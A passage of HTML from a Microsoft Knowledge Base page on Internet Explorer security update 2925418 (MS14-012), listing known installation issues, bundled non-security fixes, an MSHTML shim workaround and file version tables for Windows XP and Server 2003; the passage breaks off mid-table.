this, see <a href=\"http://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-3\" target=\"_self\">Get security updates automatically</a> on the Microsoft Safety and Security Center website. </li><li> For IT professionals, see <a href=\"http://technet.microsoft.com/security/bulletin/ms14-012\" id=\"kb-link-4\" target=\"_self\">Microsoft Security Bulletin MS14-012</a>.</li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-5\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals:<br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-6\" target=\"_self\">TechNet security support and troubleshooting</a><br/><br/>Help protect your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-7\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-8\" target=\"_self\">International support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3><ul class=\"sbody-free_list\"><li>When you try to install security update 2925418 for Internet Explorer 11 on a computer that is running Windows RT, Windows 8.1, or Windows Server 2012 R2, the update may not be installed. This problem occurs if the computer does not have one of the following servicing stack updates installed: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2904440\" id=\"kb-link-9\">2904440 </a>A servicing stack update is available for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2</div><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2919442\" id=\"kb-link-10\">2919442 </a>A servicing stack update is available for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2: March 2014</div>To resolve this problem, install update 2919442 before you install security update 2925418. </li></ul><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. See the individual articles to determine your update status.<br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2925521\" id=\"kb-link-11\">2925521 </a></td><td class=\"sbody-td\">Do you want to go to http://IntranetSiteName notification does not work in Internet Explorer</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2927972\" id=\"kb-link-12\">2927972 </a></td><td class=\"sbody-td\">Caret is missing in a webpage in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936588\" id=\"kb-link-13\">2936588 </a></td><td class=\"sbody-td\">Bing WebGL panorama homepage is blank after reload in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936590\" id=\"kb-link-14\">2936590 </a></td><td class=\"sbody-td\">Double reentrancy when you press the down arrow to scroll a virtualized list of messages in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936591\" id=\"kb-link-15\">2936591 </a></td><td class=\"sbody-td\">Back or forward action does not work as expected on a webpage in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936592\" id=\"kb-link-16\">2936592 </a></td><td class=\"sbody-td\">Animated gif images do not animate on Xbox Music sites in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936593\" id=\"kb-link-17\">2936593 </a></td><td class=\"sbody-td\">You cannot scroll on the Text Area control in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936595\" id=\"kb-link-18\">2936595 </a></td><td class=\"sbody-td\">Panning is very jittery when you browse digg.com websites in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936596\" id=\"kb-link-19\">2936596 </a></td><td class=\"sbody-td\">Title attribute of a select element is not displayed in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936597\" id=\"kb-link-20\">2936597 </a></td><td class=\"sbody-td\">Internet Explorer 11 may not respond when you switch between F12 developer tools</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936598\" id=\"kb-link-21\">2936598 </a></td><td class=\"sbody-td\">Canvas content is not displayed as expected in Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936600\" id=\"kb-link-22\">2936600 </a></td><td class=\"sbody-td\">Box shadow is not updated on a webpage in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2936601\" id=\"kb-link-23\">2936601 </a></td><td class=\"sbody-td\">Focus-based menus do not work as expected with touch in the immersive mode of Internet Explorer 11</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2938836\" id=\"kb-link-24\">2938836 </a></td><td class=\"sbody-td\">Improvement for Internet Explorer 11 add-on developers EPM compliance</td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2925418 packages for Windows XP and Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2925418 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2925418, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-25\">897225 </a>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-26\">824994 </a>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>Fix it for me</h2><div class=\"kb-resolution-section section\">The Fix it solution that's described here is not intended as a replacement for any security update. We recommend that you always install the latest security updates. However, we offer this Fix it solution as a workaround for some scenarios. <br/><br/>For more information about this workaround, go see <a href=\"http://technet.microsoft.com/security/bulletin/ms14-012\" id=\"kb-link-27\" target=\"_self\">Microsoft Security Bulletin MS14-012</a>.<br/><br/>The bulletin provides more information about the issue. This includes the following:<br/><ul class=\"sbody-free_list\"><li>The scenarios in which you might apply or disable the workaround </li><li>How to manually apply the workaround </li></ul><h4 class=\"sbody-h4\">MSHTML shim workaround</h4>To enable or disable this Fix it solution, click the <strong class=\"uiterm\">Fix it</strong> button or link under the <strong class=\"uiterm\">Enable MSHTML shim workaround</strong> or <strong class=\"uiterm\">Disable MSHTML shim workaround</strong> heading. Then, click <strong class=\"uiterm\">Run</strong> in the <strong class=\"uiterm\"> File Download</strong> dialog box, and follow the steps in the Fix it wizard. <br/><br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable MSHTML shim workaround</th><th class=\"sbody-th\">Disable MSHTML shim workaround</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span><div caption=\"Fix this problem \" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9844137\" text=\"Download\"></div></span></td><td class=\"sbody-td\"><span><div caption=\"Fix this problem \" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9844138\" text=\"Download\"></div></span></td></tr></table></div><h3 class=\"sbody-h3\">Known issues with this Fix it solution </h3><ul class=\"sbody-free_list\"><li>After you install this Fix it solution, you may experience increased memory usage when you use Internet Explorer to browse the web. This behavior occurs until you restart Internet Explorer. </li></ul><h3 class=\"sbody-h3\">Prerequisites for this Fix it solution</h3>Before you install this Fix it solution, you must first install the latest updates for Internet Explorer 9 or Internet Explorer 10. To install the most current update for Internet Explorer, go to the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-28\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div>For more information about the most current cumulative security update for Internet Explorer, go to the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-29\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>File information</h2><div class=\"kb-summary-section section\"><a class=\"bookmark\" id=\"fileinfo\"></a>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). Note that dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time bias. The dates and times may also change when you perform certain operations on the files.<br/><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Windows XP and Windows Server 2003 file information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific milestone (SP<strong class=\"sbody-strong\">n</strong>) and service branch (QFE, GDR) are noted in the \"SP requirement\" and \"Service branch\" columns. </li><li>GDR service branches contain only fixes that are broadly released to address widespread, critical issues. QFE service branches contain hotfixes in addition to broadly released fixes. </li><li> In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KB<strong class=\"sbody-strong\">number</strong>.cat) that is signed with a Microsoft digital signature. </li></ul><h3 class=\"sbody-h3\">Internet Explorer 6</h3><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported 32-bit versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.13.0</td><td class=\"sbody-td\">231,288</td><td class=\"sbody-td\">04-Sep-2013</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">1,025,024</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">03-Feb-2014</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">81,920</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">251,904</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">3,094,528</td><td class=\"sbody-td\">05-Feb-2014</td><td class=\"sbody-td\">12:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">450,048</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">532,480</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">1,510,400</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">61,952</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">633,856</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">852,992</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.2900.6512</td><td class=\"sbody-td\">668,672</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">22:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported 32-bit versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">221,488</td><td class=\"sbody-td\">08-Jul-2010</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,033,728</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">361,472</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">209,920</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">03-Feb-2014</td><td class=\"sbody-td\">12:16</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">253,952</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">3,164,160</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">459,264</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">537,600</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,520,128</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">713,216</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">854,016</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">46,080</td><td class=\"sbody-td\">03-Feb-2014</td><td class=\"sbody-td\">11:58</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">672,256</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">01:17</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported Itanium-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">501,552</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:03</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">2,543,104</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">1,009,152</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">640,512</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">997,888</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">154,112</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">9,470,976</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,533,440</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,845,760</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">116,736</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">3,700,224</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">205,824</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">50,688</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,639,424</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">2,425,344</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">45,056</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,708,032</td><td class=\"sbody-td\">04-Feb-2014</td><td 